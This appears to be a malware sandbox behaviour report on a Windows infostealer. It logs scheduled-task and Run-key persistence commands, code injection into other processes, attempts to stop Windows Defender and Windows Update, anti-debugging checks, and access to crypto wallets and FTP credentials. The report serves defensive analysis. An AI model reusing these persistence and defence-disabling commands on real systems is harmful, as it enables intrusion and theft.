RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000458 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Feb. 18, 2024, 10:41 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x00000464 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	117.18.232.200
host	185.215.113.46
host	193.233.132.62

Allocates execute permission to another process indicative of possible code injection (6 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 18, 2024, 10:35 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 18, 2024, 10:35 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 18, 2024, 10:35 a.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 18, 2024, 10:35 a.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 18, 2024, 10:35 a.m.	process_identifier: 3112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 18, 2024, 10:35 a.m.	process_identifier: 3112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Feb. 18, 2024, 10:42 a.m.	service_handle: 0x00603a88 service_name: WinDefend control_code: 1		0	0
ControlService Feb. 18, 2024, 10:42 a.m.	service_handle: 0x0060a6e8 service_name: wuauserv control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 113 events)

Time & API	Arguments	Status	Return
FindWindowExW Feb. 18, 2024, 10:41 a.m.	class_name: OLLYDBG child_after_hwnd: 0x00000000 parent_hwnd: 0x00000000 window_name: OllyDBg	1	524664
FindWindowW Feb. 18, 2024, 10:41 a.m.	class_name: WinDbgFrameClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: 18467-41 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: 18467-41 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: Regmonclass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: Regmonclass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: 18467-41 window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: Filemonclass window_name:		0
FindWindowA Feb. 18, 2024, 10:42 a.m.	class_name: Filemonclass window_name:		0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (8 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Windows\Tasks\explorgu.job
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (27 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f9722b0 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980d88 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: I»`#?Aÿã base_address: 0x0000000076d81590 process_identifier: 1864 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: Ïl base_address: 0x000000013f980d78 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: I» ?Aÿã base_address: 0x0000000076d57a90 process_identifier: 1864 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: Ïl base_address: 0x000000013f980d70 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: ÏT base_address: 0x000000013f920108 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f97aae8 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980c78 process_identifier: 1864 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f9722b0 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980d88 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: I»`#?Aÿã base_address: 0x0000000076d81590 process_identifier: 3036 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: ø base_address: 0x000000013f980d78 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: I» ?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3036 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: ø base_address: 0x000000013f980d70 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: ÏT base_address: 0x000000013f920108 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f97aae8 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980c78 process_identifier: 3036 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f9722b0 process_identifier: 3112 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980d88 process_identifier: 3112 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: I»`#?Aÿã base_address: 0x0000000076d81590 process_identifier: 3112 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980d78 process_identifier: 3112 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: I» ?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3112 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980d70 process_identifier: 3112 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: ÏT base_address: 0x000000013f920108 process_identifier: 3112 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f97aae8 process_identifier: 3112 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 18, 2024, 10:35 a.m.	buffer: base_address: 0x000000013f980c78 process_identifier: 3112 process_handle: 0x000000000000004c	1	1

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x0000045c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000460 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000458 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
